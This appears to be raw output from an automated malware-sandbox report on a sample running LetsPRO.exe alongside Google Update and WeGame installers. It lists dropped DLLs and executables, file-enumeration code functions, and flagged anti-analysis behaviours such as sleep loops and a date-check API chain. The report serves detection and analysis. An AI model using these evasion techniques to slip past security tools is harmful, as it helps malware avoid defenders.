Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIB54D.tmp Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_nl.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ro.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_it.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hu.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ta.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_vi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateOnDemand.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sl.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en-GB.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ko.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-BR.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIB404.tmp Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_uk.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sk.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lv.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-TW.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_da.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psuser.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bn.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ml.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_te.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pl.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ar.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_iw.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSIB5FB.tmp Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ur.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-TW.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_et.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_kn.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ja.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lt.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_el.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bg.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_mr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_es-419.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\WeGame\adapt_for_imports.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fa.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ar.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdate.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_el.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_de.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\WeGame\Lua51.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-BR.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en-GB.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_th.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_en.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_gu.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sr.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Program Files (x86)\WeGame\WeGame.exe Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_bn.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_lv.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\psuser_64.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_hi.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ru.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_cs.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_id.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_am.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_tr.dll Jump to dropped file
Source: C:\Program Files (x86)\ChromeSetup.exe Dropped PE file which has not been started: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_is.dll Jump to dropped file
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe Jump to dropped file
Found evasive API chain (date check)
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe API coverage: 0.1 %
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe API coverage: 8.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1848 Thread sleep count: 656 > 30 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 2436 Thread sleep count: 271 > 30 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840 Thread sleep count: 460 > 30 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840 Thread sleep time: -460000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 5532 Thread sleep count: 2633 > 30 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1272 Thread sleep count: 3264 > 30 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 1272 Thread sleep time: -32640s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840 Thread sleep count: 1615 > 30 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe TID: 3840 Thread sleep time: -1615000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep count: 258 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep count: 342 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Sleep loop found (likely to delay execution)
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread sleep count: Count: 2633 delay: -10 Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Thread sleep count: Count: 3264 delay: -10 Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C950BF3 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C950BF3
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94CB0B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose, 5_2_6C94CB0B
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9507B2 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C9507B2
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94C7E5 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose, 5_2_6C94C7E5
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C917CAD _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C917CAD
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94FE26 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94FE26
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94DFA9 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson, 5_2_6C94DFA9
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94F945 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94F945
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94DAA8 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode, 5_2_6C94DAA8
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94F48B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94F48B
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94D56F _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson, 5_2_6C94D56F
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C951054 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C951054
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C94F051 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose, 5_2_6C94F051
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00254318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor, 8_2_00254318
Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00265490 FindFirstFileExW, 8_2_00265490
Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_0001CBAB FindFirstFileExW, 16_2_0001CBAB
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_0012DB25 FindFirstFileExW, 30_2_0012DB25
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CDB6417 FindFirstFileW,GetLastError,PathStripPathW,PathStripPathW,PathStripPathW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,FindNextFileW,GetLastError,FindClose, 30_2_6CDB6417
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98E75 FindFirstFileW,GetLastError,DeleteFileW,FindNextFileW,GetLastError,FindClose, 30_2_6CC98E75
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC98FBC GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW, 30_2_6CC98FBC
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9ED9F FindFirstFileW,FindNextFileW,FindClose, 30_2_6CC9ED9F
Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_6CC9AA6F FindFirstFileW,FindNextFileW,FindClose, 30_2_6CC9AA6F
